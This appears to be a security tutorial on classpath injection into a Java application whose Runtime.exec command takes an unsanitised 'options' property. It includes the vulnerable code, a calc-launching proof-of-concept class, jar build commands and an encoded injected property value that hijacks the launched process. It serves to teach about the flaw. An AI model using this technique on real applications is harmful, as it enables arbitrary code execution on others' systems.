Classpath Injection in Runtime.exec via Java Properties
In Java, Runtime.exec is often used to invoke a new process, but it does not invoke a new command shell, which means that chaining or piping multiple commands together does not usually work. Command injection is still possible if the process spawned with Runtime.exec is a command shell like command.com, cmd.exe, or /bin/sh.
But consider the scenario where the Java application itself is the spawned process. The following example illustrates this situation.
Runtime runtime = Runtime.getRuntime();
Properties properties = new Properties();
FileInputStream fileInputStream = new FileInputStream("app.properties");
properties.load(fileInputStream);
String options = properties.getProperty("options", "");
String command = String.format("javaw %s -cp ".;./dependencies/*\" com.example.main.Example", new Object[] { options });
Process process = runtime.exec(command);
To exploit this code, it’s necessary to craft your own JAR file and use it to insert the classpath as a parameter into the Java process.
Store the following example into a file named Calc.java
, ensuring to include the package declaration at the start of the file.
package command.injection;
import java.io.IOException;
public class Calc {
public static void main(String[] args) throws IOException {
Runtime.getRuntime().exec("calc");
}
}
Compile the source code using the -d . option, which instructs the compiler to generate the specified directory structure.
javac -d . Calc.java
When creating a .jar file, you should use the cvfeP
option set to guide the packaging process.
jar cvfeP calc.jar command.injection.Calc -C . command/injection/
This ensures the preservation of the package structure (P), sets the entry point for meaningful manifest information (e), names the file (f), creates an archive (c), and enables verbose output (v). The key options to focus on are P for maintaining the package structure and e for specifying the entry point. Then, append the command with the jar’s name (test.jar) and its entry point. Conclude by using -C .
Open the calc.jar
file in a zip program to ensure that it has the following directory structure:
command/
├─ injection/
│ ├─ Calc.class
META-INF/
├─ MANIFEST.MF
The MANIFEST.MF
should contain the following:
Manifest-Version: 1.0
Created-By: <JDK Version> (Oracle Corporation)
Main-Class: command.injection.Calc
When manually editing your manifest file, it’s important to retain the newline at the end; otherwise, Java will not recognize the manifest correctly.
Place calc.jar
into the /dependencies
directory of the target application.
Add the following property to the configuration file (application.properties
) of the application:
options=-cp\u0020\u0022C:/PATH/TO/JAR/*\u0022\u0020command.injection.Calc\u0020\u0026\u003A\u003A\u0020
Run the target application and observe that instead of the expected program, the calculator app will launch.
Below is the value that was fed into the exec function.
javaw -cp "C:/PATH/TO/JAR/*" command.injection.Calc &:: -cp ".;./dependencies/*\" com.example.main.Example